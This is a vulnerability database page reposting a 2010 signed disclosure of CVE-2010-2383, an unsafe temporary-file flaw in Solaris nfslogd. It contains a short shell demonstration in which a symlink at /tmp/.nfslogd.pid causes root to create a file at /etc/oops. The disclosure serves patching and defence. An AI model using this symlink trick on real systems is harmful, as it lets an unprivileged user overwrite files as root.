Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Solaris nfslogd Unsafe Use Of Temporary Files

🗓️ 21 Jul 2010 00:00:00Reported by Frank StuartType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 50 Views

Solaris nfslogd vulnerability allows unprivileged user to create/overwrite root file

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2010-2382
12 Jul 201000:00
circl
Circl		CVE-2010-2383
13 Jul 201000:00
circl
CVE		CVE-2010-2382
13 Jul 201022:07
cve
CVE		CVE-2010-2383
13 Jul 201022:07
cve
Cvelist		CVE-2010-2382
13 Jul 201022:07
cvelist
Cvelist		CVE-2010-2383
13 Jul 201022:07
cvelist
EUVD		EUVD-2010-2392
7 Oct 202500:30
euvd
EUVD		EUVD-2010-2393
7 Oct 202500:30
euvd
NVD		CVE-2010-2382
13 Jul 201022:30
nvd
NVD		CVE-2010-2383
13 Jul 201022:30
nvd
Rows per page
`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Below is the full disclosure information for CVE-2010-2383. It was  
reported to [email protected] on 29 December, 2009 and assigned Sun  
bug 6913655.  
  
This vulnerability was addressed by Sun/Oracle in the July 2010 Critical  
Patch Update  
(http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html).  
  
- ------  
This one is with nfslogd which allows an unprivileged  
user to create/overwrite a file as root:  
  
Don't Panic! # ls -dl /etc/oops  
/etc/oops: No such file or directory  
Don't Panic! # ls -dl /tmp/.nfslogd.pid  
lrwxrwxrwx 1 nobody nobody 9 Dec 29 21:24 /tmp/.nfslogd.pid  
- -> /etc/oops  
Don't Panic! # id  
uid=0(root) gid=0(root)  
Don't Panic! # /usr/lib/nfs/nfslogd  
Don't Panic! # ls -dl /etc/oops  
- -rw------- 1 root root 4 Dec 29 21:25 /etc/oops  
  
- ------  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.3 (MingW32)  
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/  
  
iQEVAwUBTEUK12KGA6cQSpZSAQKDmgf+Khyu8Mq5rk4wKHUGQm4NCZOvC75ilW2e  
Nr9dw/YEEDIZZkaGHRRtPD9pBgnrdCbP/Pvt6wSYyr+JOLYCO1BGGFA36eenTgzI  
lbpDuFDgpVO4+DPb5TslS1MYkLYYFh+S9l0zzdYGVvAbURabp35VW852O2SHY7Pg  
ZsUjRUrbSMIPUcVq024CLtro2VCJPiZ9o691ChpNlkdCTdtS6PUCllwQazz/2UFO  
Gf21llPnO7kkQP7zbjbTITx9cjx6hYOxKbfLtrupxjtnXHRIjts0ToFxUYnT5eWD  
3I/1m8/VjnqQSIY7nytcIj+nZG1z7e/zhOmdE54wRcpQzONYngNcWA==  
=ojGd  
-----END PGP SIGNATURE-----  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Jul 2010 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.00186
solarisnfslogdvulnerabilityunprivileged userroot files
50